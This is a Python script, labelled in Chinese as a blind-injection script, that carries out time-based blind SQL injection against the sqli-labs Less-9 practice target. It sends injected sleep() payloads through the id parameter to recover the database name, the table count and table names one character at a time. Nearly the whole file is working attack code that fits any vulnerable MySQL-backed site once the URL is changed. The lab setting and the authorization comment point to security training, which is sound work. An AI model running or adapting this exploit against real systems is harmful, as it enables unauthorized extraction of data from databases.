盲注脚本 — time-based blind SQL injection script (sqli-labs Less-9 lab target; detection relies on injected `sleep()` delays)

import requests
import time

# Upper bounds for the linear probes below.  Each probe walks 0..MAX-1 and
# gives up when nothing matches, so raise these for a target with longer
# names or more objects than the defaults allow.
MAX_DBName_len = 100
MAX_TableName_len = 100
MAX_ColumnName_len = 100
MAX_Data_len = 100
MAX_Table_Num = 100
MAX_Column_Num = 100
MAX_Data_Num = 100

# Candidate alphabet, tried in this order for every character position.  A
# name containing a character outside this set cannot be recovered; the
# extraction functions print "Letters too little!" and stop in that case.
chars = (
    '0123456789'
    'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    'abcdefghijklmnopqrstuvwxyz'
    '{}_!@#$%^&*()'
)

# Injection point: the `id` parameter of sqli-labs Less-9 on a private lab
# host.  Point this only at a system you are authorized to test.
target_url = "http://192.168.119.135/sqli-labs/Less-9/?id=1"


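def get_DBName_len():
    """Recover the length of the current database name by time-based probing.

    For each candidate length ``i`` in ``0..MAX_DBName_len-1`` one request is
    sent whose payload calls ``sleep(3)`` only when ``length(database())``
    equals ``i``; a response slower than the injected delay is taken as a
    match.  The payload ends in ``%2D%2D%20`` (``-- ``) to comment out the
    remainder of the original query.

    Returns:
        The matched length.

    Raises:
        SystemExit: if no candidate up to ``MAX_DBName_len - 1`` matched.
        requests.exceptions.RequestException: on connection failure, or when a
            single request exceeds the socket timeout (the original had no
            timeout and would hang forever on an unresponsive target).
    """
    print("Start to get DBName_len...")
    url_template = target_url + "' union select 1,2,if (length(database())={0},sleep(3),null) %2D%2D%20"
    # Seconds injected via sleep(); a response is "slow" when it exceeds this.
    # Network jitter above the delay will register as a false match, so keep
    # the delay well above the target's normal latency.
    delay = 3
    # Must stay comfortably above the injected sleep or true matches would be
    # cut off by the client before the delayed response arrives.
    timeout = delay + 10

    for candidate in range(MAX_DBName_len):
        # Monotonic clock: wall-clock adjustments must not fake a delay.
        started = time.monotonic()
        requests.get(url_template.format(candidate), timeout=timeout)
        if time.monotonic() - started > delay:
            print("DBName_len is: ", candidate)
            return candidate

    # Probe range exhausted without a match.
    print("DBName_len > MAX_DBName_len!")
    print("Cannot get DB_len. Program ended.")
    raise SystemExit(1)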

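def get_DBName(DBName_len):
    """Recover the current database name one character at a time.

    For each position ``i`` (1-based, as MySQL ``substr`` expects) every
    character in ``chars`` is tried in order; the payload calls ``sleep(2)``
    only when ``ascii(substr(database(), i, 1))`` equals the candidate's code
    point, so a response slower than the delay identifies the character.

    Args:
        DBName_len: Number of characters to recover (see get_DBName_len).
            0 yields an empty name without sending any request.

    Returns:
        The recovered name.

    Raises:
        SystemExit: if some position matched none of ``chars`` (the real
            character lies outside the alphabet).
        requests.exceptions.RequestException: on connection failure or when a
            request exceeds the socket timeout.
    """
    print("Start to retrieve database name...")
    url_template = target_url + "' union select 1,2, if(ascii(substr(database(),{0},1))={1},sleep(2),null) %2D%2D%20"
    # Injected sleep() length; keep it above the target's normal latency to
    # avoid false matches from jitter.
    delay = 2
    # Must exceed the injected sleep so genuine slow responses are not cut off.
    timeout = delay + 10
    recovered = []

    for position in range(1, DBName_len + 1):
        for candidate in chars:
            started = time.monotonic()
            requests.get(url_template.format(position, ord(candidate)), timeout=timeout)
            if time.monotonic() - started > delay:
                recovered.append(candidate)
                break
        else:
            # No candidate slowed the response: the character is not in `chars`.
            print("Letters too little! Program ended.")
            raise SystemExit(1)

    DBName = "".join(recovered)
    print("Retrieve completed! DBName is: " + DBName)
    return DBName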

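def get_TableNumOfDB(DBName):
    """Count the tables in the current database by time-based probing.

    For each candidate count the payload runs ``select count(table_name)a
    from information_schema.tables where table_schema = database() having
    a={candidate}`` and calls ``sleep(2)`` only when that subquery yields a
    true value.  Note that a count of 0 evaluates as false in ``if()``, so an
    empty schema cannot be told apart from "no match".

    Args:
        DBName: Accepted for symmetry with the other helpers but not used —
            the payload always counts tables of ``database()``.

    Returns:
        The matched count, or 0 when nothing up to ``MAX_Table_Num - 1``
        matched (a warning is printed in that case).

    Raises:
        requests.exceptions.RequestException: on connection failure or when a
            request exceeds the socket timeout.
    """
    print("Start to get TableNumOfDB...")
    url_template = target_url + "' and if ((select count(table_name)a from information_schema.tables where table_schema = database() having a={0}),sleep(2),true) %2D%2D%20"
    delay = 2
    # Must exceed the injected sleep so genuine slow responses are not cut off.
    timeout = delay + 10

    for candidate in range(MAX_Table_Num):
        started = time.monotonic()
        requests.get(url_template.format(candidate), timeout=timeout)
        if time.monotonic() - started > delay:
            print("the number of table is:", candidate)
            return candidate

    # The original compared `i` against `TableNumOfDB - 1` (always -1 here),
    # so this warning could never fire and also named the wrong constant.
    print("table number of database > MAX_Table_Num!")
    return 0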

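def get_TableName_len(Table_num):
    """Recover the length of the ``Table_num``-th table name (1-based).

    The payload selects a single ``table_name`` with ``limit Table_num-1,1``
    and calls ``sleep(2)`` only when its ``length()`` equals the candidate.
    Because of the ``- 1``, callers must pass a 1-based index; ``Table_num=0``
    produces ``limit -1,1``, which MySQL presumably rejects, so every probe
    would then fail and 0 would be returned.

    Args:
        Table_num: 1-based position of the table within the current schema.

    Returns:
        The matched length, or 0 when nothing up to ``MAX_TableName_len - 1``
        matched (a warning is printed in that case).

    Raises:
        requests.exceptions.RequestException: on connection failure or when a
            request exceeds the socket timeout.
    """
    print("Start to get TableName_len...")
    url_template = target_url + "' and if (( (select length(table_name) from information_schema.tables where table_schema = database() limit {0},1)={1}),sleep(2),true) %2D%2D%20"
    delay = 2
    # Must exceed the injected sleep so genuine slow responses are not cut off.
    timeout = delay + 10
    offset = Table_num - 1

    for candidate in range(MAX_TableName_len):
        started = time.monotonic()
        requests.get(url_template.format(offset, candidate), timeout=timeout)
        if time.monotonic() - started > delay:
            return candidate

    # Probe range exhausted; the caller sees 0 and will recover an empty name.
    print("TableName_len > MAX_TableName_len!")
    return 0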

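def get_TableName(Table_num, TableName_len):
    """Recover the ``Table_num``-th table name one character at a time.

    For each position (1-based, as ``substr`` expects) every character in
    ``chars`` is tried; the payload calls ``sleep(2)`` only when the ASCII
    code of that character of ``(select table_name ... limit Table_num-1,1)``
    equals the candidate's code point.

    Args:
        Table_num: 1-based position of the table within the current schema
            (the payload subtracts 1 for ``LIMIT``).
        TableName_len: Number of characters to recover (see
            get_TableName_len); 0 yields an empty name without any request.

    Returns:
        The recovered name.

    Raises:
        SystemExit: if some position matched none of ``chars``.
        requests.exceptions.RequestException: on connection failure or when a
            request exceeds the socket timeout.
    """
    print("Start to get TableName...")
    url_template = target_url + "' and if ((ascii(substr((select table_name from information_schema.tables where table_schema = database() limit {0},1),{1},1))={2}),sleep(2),true) %2D%2D%20"
    delay = 2
    # Must exceed the injected sleep so genuine slow responses are not cut off.
    timeout = delay + 10
    offset = Table_num - 1
    recovered = []

    for position in range(1, TableName_len + 1):
        for candidate in chars:
            started = time.monotonic()
            requests.get(url_template.format(offset, position, ord(candidate)), timeout=timeout)
            if time.monotonic() - started > delay:
                recovered.append(candidate)
                break
        else:
            # No candidate slowed the response: the character is not in `chars`.
            print("Letters too little! Program ended.")
            raise SystemExit(1)

    TableName = "".join(recovered)
    print("Retrieve completed! TableName is: " + TableName)
    return TableName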

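if __name__ == "__main__":
    # The per-table helpers take a 1-based index (they pass Table_num - 1 to
    # LIMIT), so the original `range(0, 4+1)` probed offset -1 on its first
    # pass and silently produced an empty name.  Derive the table count from
    # the target instead of hard-coding 4; the DBName argument is unused by
    # get_TableNumOfDB, which always inspects database().
    table_count = get_TableNumOfDB(None)
    for table_index in range(1, table_count + 1):
        TableName_len = get_TableName_len(table_index)
        TabName = get_TableName(table_index, TableName_len)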